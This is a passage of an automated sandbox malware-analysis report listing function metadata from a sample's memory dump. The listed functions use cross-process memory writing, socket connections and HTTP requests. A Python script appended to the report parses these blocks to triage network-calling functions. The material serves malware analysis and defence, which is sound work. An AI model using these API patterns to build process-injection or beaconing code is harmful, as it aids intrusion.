• Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_x.jbxd
Similarity
• API ID: MessageSend$_wcslen$_wcspbrk
• String ID:
• API String ID: 1856069659-0
APIs
• GetCursorPos.USER32(?), ref: 004478E2
• TrackPopupMenuEx.USER32(00000000,00000000,?,?,?,00000000), ref: 004478FC
• DefDlgProcW.USER32(?,0000007B,?,?), ref: 0044791D
• GetCursorPos.USER32(00000000), ref: 0044796A
• TrackPopupMenuEx.USER32(02FB6648,00000000,00000000,?,?,00000000), ref: 00447991
Memory Dump Source
• Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_x.jbxd
Similarity
• API ID: CursorMenuPopupTrack$Proc
• String ID:
• API String ID: 1300944170-0
APIs
• GetClientRect.USER32(?,?), ref: 004479CC
• GetCursorPos.USER32(?), ref: 004479D7
• ScreenToClient.USER32(?,?), ref: 004479F3
• WindowFromPoint.USER32(?,?), ref: 00447A34
• DefDlgProcW.USER32(?,00000020,?,?), ref: 00447AAD
Memory Dump Source
• Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_x.jbxd
Similarity
• API ID: Client$CursorFromPointProcRectScreenWindow
• String ID:
• API String ID: 1822080540-0
APIs
• GetWindowRect.USER32(?,?), ref: 00447C5D
• ScreenToClient.USER32(?,?), ref: 00447C7B
• SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00447C8E
• Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00447CD5
• EndPaint.USER32(?,?), ref: 00447D13
Memory Dump Source
• Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_x.jbxd
Similarity
• API ID: ClientPaintRectRectangleScreenViewportWindow
• String ID:
• API String ID: 659298297-0
APIs
• EnableWindow.USER32(?,00000000), ref: 00448B5C
• EnableWindow.USER32(?,00000001), ref: 00448B72
• ShowWindow.USER32(?,00000000), ref: 00448BE8
• ShowWindow.USER32(?,00000004), ref: 00448BF4
• EnableWindow.USER32(?,00000001), ref: 00448C09
  • Part of subcall function 00440D98: SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 00440DB8
  • Part of subcall function 00440D98: GetWindowLongW.USER32(?,000000F0), ref: 00440DFA
  • Part of subcall function 00440D98: GetWindowLongW.USER32(?,000000F0), ref: 00440E3A
  • Part of subcall function 00440D98: SendMessageW.USER32(02FB5FA0,000000F1,00000000,00000000), ref: 00440E6E
  • Part of subcall function 00440D98: SendMessageW.USER32(02FB5FA0,000000F1,00000001,00000000), ref: 00440E9A
Memory Dump Source
• Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_x.jbxd
Similarity
• API ID: Window$EnableMessageSend$LongShow
• String ID:
• API String ID: 142311417-0
Memory Dump Source
• Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_x.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
APIs
• IsWindowVisible.USER32(?), ref: 00445879
• SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00445893
• SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 004458CD
• _wcslen.LIBCMT ref: 004458FB
• CharUpperBuffW.USER32(00000000,00000000), ref: 00445905
Memory Dump Source
• Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3087257052-0
APIs
  • Part of subcall function 00465225: inet_addr.WSOCK32(?), ref: 00465249
• socket.WSOCK32(00000002,00000001,00000006,00000000), ref: 004653FE
• WSAGetLastError.WSOCK32(00000000), ref: 0046540D
• connect.WSOCK32(00000000,?,00000010), ref: 00465446
• WSAGetLastError.WSOCK32(00000000), ref: 0046546D
• closesocket.WSOCK32(00000000,00000000), ref: 00465481
Memory Dump Source
• Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_x.jbxd
Similarity
• API ID: ErrorLast$closesocketconnectinet_addrsocket
• String ID:
• API String ID: 245547762-0
APIs
• DeleteObject.GDI32(00000000), ref: 004471D8
• ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
• SelectObject.GDI32(?,00000000), ref: 00447228
• BeginPath.GDI32(?), ref: 0044723D
• SelectObject.GDI32(?,00000000), ref: 00447266
Memory Dump Source
• Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_x.jbxd
Similarity
• API ID: Object$Select$BeginCreateDeletePath
• String ID:
• API String ID: 2338827641-0
APIs
• Sleep.KERNEL32(00000000), ref: 00434598
• QueryPerformanceCounter.KERNEL32(?), ref: 004345B5
• Sleep.KERNEL32(00000000), ref: 004345D4
• QueryPerformanceCounter.KERNEL32(?), ref: 004345DE
Memory Dump Source
• Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_x.jbxd
Similarity
• API ID: CounterPerformanceQuerySleep
• String ID:
• API String ID: 2875609808-0
APIs
• GetDlgItem.USER32(?,000003E9), ref: 00460C17
• GetWindowTextW.USER32(00000000,?,00000100), ref: 00460C2E
• MessageBeep.USER32(00000000), ref: 00460C46
• KillTimer.USER32(?,0000040A), ref: 00460C68
• EndDialog.USER32(?,00000001), ref: 00460C83
Memory Dump Source
• Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_x.jbxd
Similarity
• API ID: BeepDialogItemKillMessageTextTimerWindow
• String ID:
• API String ID: 3741023627-0
APIs
Memory Dump Source
• Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_x.jbxd
Similarity
• API ID: Destroy$DeleteObjectWindow$Icon
• String ID:
• API String ID: 4023252218-0
APIs
• SendMessageW.USER32(?,00001101,00000000,?), ref: 004555FC
• DeleteObject.GDI32(?), ref: 00455736
• DeleteObject.GDI32(?), ref: 00455744
• DestroyIcon.USER32(?), ref: 00455752
• DestroyWindow.USER32(?), ref: 00455760
Memory Dump Source
• Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_x.jbxd
Similarity
• API ID: DeleteDestroyObject$IconMessageSendWindow
• String ID:
• API String ID: 1489400265-0
                                                                                                                                                    • Opcode ID: 7dd20da83386a23a1814408c1199d2c33e99a8c26f67204b6fd348d50f61361a
                                                                                                                                                    • Instruction ID: 3262712e9a8127eed33bb9eb3d9864066e7dde5d47db0d590f2b6463dd6d37f9
                                                                                                                                                    • Opcode Fuzzy Hash: 7dd20da83386a23a1814408c1199d2c33e99a8c26f67204b6fd348d50f61361a
                                                                                                                                                    • Instruction Fuzzy Hash: 07017C74300601DBCB10EF25EEC8A2A73A8BF48712F004569FE019B286D778DC49CB68
APIs
  • Part of subcall function 00430003: InvalidateRect.USER32(?,00000000,00000001), ref: 00430091
• DestroyWindow.USER32(?), ref: 00455728
• DeleteObject.GDI32(?), ref: 00455736
• DeleteObject.GDI32(?), ref: 00455744
• DestroyIcon.USER32(?), ref: 00455752
• DestroyWindow.USER32(?), ref: 00455760
Memory Dump Source
• Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_x.jbxd
Similarity
• API ID: Destroy$DeleteObjectWindow$IconInvalidateRect
• String ID:
• API String ID: 1042038666-0
• Opcode ID: 9df849479103f2de49514c9ec76f9cef1897402069f9b01ba3cc14c1fa4130bc
• Instruction ID: 2016740d4609c4bbd0e5f1cf6dc7522ca00853e433b5032f7809eda0dc31aff9
• Opcode Fuzzy Hash: 9df849479103f2de49514c9ec76f9cef1897402069f9b01ba3cc14c1fa4130bc
• Instruction Fuzzy Hash: 3701F670200601DBCB10EF69E9D8A2B37ACAF49762B00466AFD01D7256D769DC498B69
APIs
• __getptd.LIBCMT ref: 0041780F
  • Part of subcall function 00417A69: __getptd_noexit.LIBCMT ref: 00417A6C
  • Part of subcall function 00417A69: __amsg_exit.LIBCMT ref: 00417A79
• __getptd.LIBCMT ref: 00417826
• __amsg_exit.LIBCMT ref: 00417834
• __lock.LIBCMT ref: 00417844
• __updatetlocinfoEx_nolock.LIBCMT ref: 00417858
Memory Dump Source
• Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_x.jbxd
Similarity
• API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
• String ID:
• API String ID: 938513278-0
• Opcode ID: 82c9f3bbc84dc287df7640515fd49376d4ae64643407e313ceafc36016311655
• Instruction ID: 276dd8d19a6a3be70f37c916a71154ef36d62806621923b96dbf7b6e4fe89171
• Opcode Fuzzy Hash: 82c9f3bbc84dc287df7640515fd49376d4ae64643407e313ceafc36016311655
• Instruction Fuzzy Hash: 6DF09632A4C7009AD721BBA6940B7DD33B0AF10768F11415FF541572D2CB6C59C1CB9D
APIs
  • Part of subcall function 004118F0: _doexit.LIBCMT ref: 004118FC
• ___set_flsgetvalue.LIBCMT ref: 004151C0
  • Part of subcall function 004178AE: TlsGetValue.KERNEL32(?,00417A07,?,004115F6,?,00401BAC,?,?,?), ref: 004178B7
  • Part of subcall function 004178AE: TlsSetValue.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 004178D8
• ___fls_getvalue@4.LIBCMT ref: 004151CB
  • Part of subcall function 0041788E: TlsGetValue.KERNEL32(?,?,00413D30,00000000), ref: 0041789C
• ___fls_setvalue@8.LIBCMT ref: 004151DD
• GetLastError.KERNEL32(00000000,?,00000000), ref: 004151E6
• ExitThread.KERNEL32 ref: 004151ED
• __freefls@4.LIBCMT ref: 00415209
Memory Dump Source
• Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_x.jbxd
Similarity
• API ID: Value$ErrorExitLastThread___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4_doexit
• String ID:
• API String ID: 4247068974-0
• Opcode ID: 3508d61e785490a8cfc18c63a66594c600054726567160c295e9e14b5a274e31
• Instruction ID: 3b3fb4cf1982b2ada2e5851f983e2cc6228237abb2dca353483d11accd99f00a
• Opcode Fuzzy Hash: 3508d61e785490a8cfc18c63a66594c600054726567160c295e9e14b5a274e31
• Instruction Fuzzy Hash: E5E0B631848705AECB013BB29D1E9DF3A799E54749B20082ABE1492122EE6C88D1C669
Strings
Memory Dump Source
• Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_x.jbxd
Similarity
• API ID:
• String ID: )$U$\
• API String ID: 0-3705770531
• Opcode ID: 028001eb2bff774db3903015b7fa80ce6d69291786b8857f67b928b721b55690
• Instruction ID: d0f1885598f34d5f764b4f2a5794ec4e3d7857f6dac93f6e146ba8491093b400
• Opcode Fuzzy Hash: 028001eb2bff774db3903015b7fa80ce6d69291786b8857f67b928b721b55690
• Instruction Fuzzy Hash: 83C1C074A00249CFEB24CF69C5806AEBBF2FF85304F2481ABD8569B351D739994ACF15
APIs
  • Part of subcall function 004426CD: _wcslen.LIBCMT ref: 004426F9
• CoInitialize.OLE32(00000000), ref: 0046E505
• CoCreateInstance.OLE32(00482A08,00000000,00000001,004828A8,?), ref: 0046E51E
• CoUninitialize.OLE32 ref: 0046E53D
Strings
Memory Dump Source
• Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_x.jbxd
Similarity
• API ID: CreateInitializeInstanceUninitialize_wcslen
• String ID: .lnk
• API String ID: 886957087-24824748
• Opcode ID: 275befd32e5b5cb51e2fc879a9ecc6bbb724afd33f596a1e549e31a6ffdfd8c7
• Instruction ID: 2644725dabb75134900838bfbf7f9974cf5b6b8c274c659ea1b0544ab4b4cf98
• Opcode Fuzzy Hash: 275befd32e5b5cb51e2fc879a9ecc6bbb724afd33f596a1e549e31a6ffdfd8c7
• Instruction Fuzzy Hash: A6A1CB756042019FC700EF65C980E5BB7E9AFC8308F108A5EF9859B392DB35EC45CBA6
                                                                                                                                                    APIs
                                                                                                                                                    Strings
Memory Dump Source
• Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_x.jbxd
Similarity
• API ID: _memmove
• String ID: \
• API String ID: 4104443479-2967466578
Similarity
• API ID: _memmove
• String ID: \
• API String ID: 4104443479-2967466578
Similarity
• API ID: _memmove
• String ID: \
• API String ID: 4104443479-2967466578
Strings
• \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 0046A75B
Similarity
• API ID: _memmovestd::exception::exception$Exception@8Throw_malloc_wcslen
• String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
• API String ID: 708495834-557222456
APIs
  • Part of subcall function 00434319: WriteProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 0043434A
• SendMessageW.USER32(?,00001104,00000000,00000000), ref: 004365EF
  • Part of subcall function 004342DD: ReadProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 0043430E
  • Part of subcall function 004343AD: GetWindowThreadProcessId.USER32(?,?), ref: 004343E0
  • Part of subcall function 004343AD: OpenProcess.KERNEL32(00000438,00000000,?), ref: 004343F1
  • Part of subcall function 004343AD: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004), ref: 00434408
• SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0043665F
• SendMessageW.USER32(00000000,00001111,00000000,00000000), ref: 004366DF
Similarity
• API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
• String ID: @
• API String ID: 4150878124-2766056989
Similarity
• API ID: _memmove
• String ID: \$]$h
• API String ID: 4104443479-3262404753
APIs
• ShellExecuteExW.SHELL32(0000003C), ref: 00457D67
  • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
  • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
• CloseHandle.KERNEL32(?), ref: 00457E09
Similarity
• API ID: CloseExecuteHandleShell_wcscpy_wcslen
• String ID: <$@
• API String ID: 2417854910-1426351568
APIs
• InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0044A87A
• HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0044A8C9
• HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 0044A901
  • Part of subcall function 004422CB: GetLastError.KERNEL32 ref: 004422E1
Strings
Memory Dump Source
• Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_x.jbxd
Similarity
• API ID: Http$ErrorInfoInternetLastOpenQueryRequestSend
• String ID:
• API String ID: 3705125965-3916222277
• Opcode ID: 0ee13e9a60eb6ba6c748d714ed0ce9e8e081c7518857538375ec5b6ad63af0be
• Instruction ID: d28fa13b4dde737238ce5dcfaacd3c540a76458eeabd88e5a6b3f8614e5f537b
• Opcode Fuzzy Hash: 0ee13e9a60eb6ba6c748d714ed0ce9e8e081c7518857538375ec5b6ad63af0be
• Instruction Fuzzy Hash: DB310B76A802047AE720EF56DC42FDFB7A8EBD9710F00851FFA0097281D6B5550987AC
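The function blocks in this part of the report (APIs, Memory Dump Source, Similarity) are what an analyst pivots on when triaging the unpacked payload: the WinINet call chain above is the function to look at next to the network section, and the Opcode ID identifies a function when the listing repeats it. The script below is an added example, not part of the Joe Sandbox report or of Joe Security's tooling: it parses blocks in exactly the layout shown on this page into records, drops repeated functions by Opcode ID, and lists the functions that call into a network module with their API calls in address order. The sample input is an abbreviated excerpt of the blocks above plus one constructed repeat of the GetDiskFreeSpaceExW block; the network-module watch-list is an assumption chosen for this example.

```python
"""Parse Joe Sandbox function metadata blocks (APIs / Memory Dump Source /
Similarity) into records and triage them.  Added example, not report tooling."""
from __future__ import annotations
import re
from dataclasses import dataclass, field

# One API entry, e.g.
#   InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0044A87A
#   GetMenuItemInfoW.USER32 ref: 0045FAC4
#   Part of subcall function 004422CB: GetLastError.KERNEL32 ref: 004422E1
API_LINE = re.compile(
    r"^(?:Part of subcall function (?P<sub>[0-9A-F]+): )?"
    r"(?P<name>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,? ref: (?P<ref>[0-9A-F]+)$"
)
SECTIONS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}
# Assumption: a watch-list picked for this example, not a Joe Sandbox rule.
NETWORK_MODULES = {"WININET", "WINHTTP", "WS2_32"}


@dataclass
class ApiCall:
    name: str
    module: str
    args: tuple
    ref: str
    subcall_of: str | None = None   # set when the call sits in a subcall


@dataclass
class FunctionRecord:
    apis: list = field(default_factory=list)
    strings: list = field(default_factory=list)
    source_file: str = ""
    associated: list = field(default_factory=list)
    meta: dict = field(default_factory=dict)   # Similarity key/value pairs


def parse_report(text: str) -> list[FunctionRecord]:
    """One FunctionRecord per 'APIs' block, in listing order."""
    records, section, current = [], None, None
    for raw in text.splitlines():
        line = raw.strip().lstrip("• ").strip()
        if line.endswith("Download File"):          # web-page link residue
            line = line[: -len("Download File")].strip()
        if not line:
            continue
        if line in SECTIONS:
            if line == "APIs":                      # every block opens with APIs
                current = FunctionRecord()
                records.append(current)
            section = line
            continue
        if current is None:
            continue
        if section == "APIs":
            m = API_LINE.match(line)
            if m:
                args = tuple(a for a in (m["args"] or "").split(",") if a)
                current.apis.append(ApiCall(m["name"], m["module"], args, m["ref"], m["sub"]))
        elif section == "Strings":
            current.strings.append(line)
        elif section in ("Memory Dump Source", "Similarity"):
            key, _, value = line.partition(":")
            key, value = key.strip(), value.strip()
            if section == "Similarity":
                current.meta[key] = value
            elif key == "Source File":
                current.source_file = value
            elif key == "Associated":
                current.associated.append(value)
    return records


def dedupe(records: list[FunctionRecord]) -> list[FunctionRecord]:
    """Keep the first of any functions listed with the same Opcode ID."""
    seen: dict = {}
    for r in records:
        seen.setdefault(r.meta.get("Opcode ID") or id(r), r)
    return list(seen.values())


def network_functions(records: list[FunctionRecord]) -> list[tuple[str, list[str]]]:
    """(short Opcode ID, direct API calls in address order) for every function
    that touches a network module; subcall entries are left out of the chain."""
    hits = []
    for r in records:
        if any(c.module in NETWORK_MODULES for c in r.apis):
            direct = sorted((c for c in r.apis if c.subcall_of is None), key=lambda c: int(c.ref, 16))
            hits.append((r.meta.get("Opcode ID", "")[:16], [c.name for c in direct]))
    return hits


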